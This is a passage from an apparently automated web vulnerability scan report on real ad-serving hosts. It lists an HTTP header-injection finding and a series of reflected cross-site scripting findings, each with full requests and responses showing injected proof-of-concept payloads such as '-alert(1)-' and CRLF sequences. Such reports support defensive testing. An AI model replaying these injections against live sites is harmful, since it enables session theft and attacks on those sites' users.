Set-Cookie: Tsid=0^1304955421^1304958800|18181^1304955421^1304957226|13015^1304957000^1304958800; path=/; expires=Mon, 09-May-11 16:33:20 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:cce56ea51bb938bc8d726cc79d6aee7f1b9c5
8a1db01b318,a847d6095e047baa644f1ef7d852edf7; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=; expires=Thu, 03-May-12 16:03:20 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|
...[SNIP]...
1.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload ee445%0d%0a5cd11e0d9a was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ABV&si=ee445%0d%0a5cd11e0d9a&pi=L&xs=3&pu=http%253A//today.msnbc.msn.com/id/42953716/ns/today-books/%253Fifu%253D%2526cmmiss%253D-1%2526cmkw%253D&df=1&v=5.5&cb=56991 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://today.msnbc.msn.com/id/42953716/ns/today-books/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; Tsid=0^1304955421^1304957226|18181^1304955421^1304957226; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; N=2:cce56ea51bb938bc8d726cc79d6aee7f,cce56ea51bb938bc8d726cc79d6aee7f; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:03:19 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:18:19 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:03:19 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561799; path=/; expires=Mon, 16-May-11 16:03:19 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304958799|18181^1304955421^1304957226|ee445
5cd11e0d9a^1304956999^1304958799; path=/; expires=Mon, 09-May-11 16:33:19 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:cce56ea51bb938bc8d726cc79d6aee7f,a847d6095e047baa644f1ef7d852edf7; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=; expires=Thu, 03-May-12 16:03:19 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|
...[SNIP]...
2. Cross-site scripting (reflected)  previous  next
There are 93 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158f4'-alert(1)-'425ad1b248f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008158f4'-alert(1)-'425ad1b248f/be_ent;sz=728x90;ord=957008422? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:35 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008158f4'-alert(1)-'425ad1b248f/be_ent;sz=728x90;net=q1;ord=957008422;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.2. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 128ac'-alert(1)-'056ec58c537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent128ac'-alert(1)-'056ec58c537;sz=728x90;ord=957008422? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:03:36 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:36 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent128ac'-alert(1)-'056ec58c537;sz=728x90;net=q1;ord=957008422;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.3. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83823'-alert(1)-'816447c14fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent;sz=728x90;ord=957008422?&83823'-alert(1)-'816447c14fd=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Mon, 09 May 2011 16:03:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:35 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422?&83823'-alert(1)-'816447c14fd=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.4. http://a.collective-media.net/adj/q1.q.gc.6008/be_ent [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdb7e'-alert(1)-'a2981bf4958 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_ent;sz=728x90;ord=957008422?fdb7e'-alert(1)-'a2981bf4958 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/article/20110509/FEATURES07/305090030/Monday-s-TV-Talk-Show-Lineup?odyssey=mod%7Cnewswell%7Ctext%7CHome%7Cs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:03:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:03:34 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_ent;sz=728x90;net=q1;ord=957008422?fdb7e'-alert(1)-'a2981bf4958;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.5. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50caf'-alert(1)-'0a4d50628ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.600850caf'-alert(1)-'0a4d50628ab/be_life;sz=728x90;ord=957064653? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:42 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.600850caf'-alert(1)-'0a4d50628ab/be_life;sz=728x90;net=q1;ord=957064653;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.6. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb04b'-alert(1)-'d57cf2cc2f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_lifefb04b'-alert(1)-'d57cf2cc2f8;sz=728x90;ord=957064653? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:04:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:43 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_lifefb04b'-alert(1)-'d57cf2cc2f8;sz=728x90;net=q1;ord=957064653;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.7. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2796f'-alert(1)-'6553dc1d4e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_life;sz=728x90;ord=957064653?&2796f'-alert(1)-'6553dc1d4e1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Mon, 09 May 2011 16:04:42 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:42 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653?&2796f'-alert(1)-'6553dc1d4e1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.8. http://a.collective-media.net/adj/q1.q.gc.6008/be_life [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8e'-alert(1)-'337d27fc70 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.6008/be_life;sz=728x90;ord=957064653?34c8e'-alert(1)-'337d27fc70 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:04:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:04:41 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.gc.6008/be_life;sz=728x90;net=q1;ord=957064653?34c8e'-alert(1)-'337d27fc70;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
2.9. http://a.collective-media.net/adj/q1.q.gc.6008/life [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.gc.6008/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55956'-alert(1)-'8f11511390b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.gc.600855956'-alert(1)-'8f11511390b/life;sz=728x90;ord=957049792? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.courier-journal.com/section/FEATURES
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 16:04:26 GMT
Connection: close
Vary: Accept-Encoding
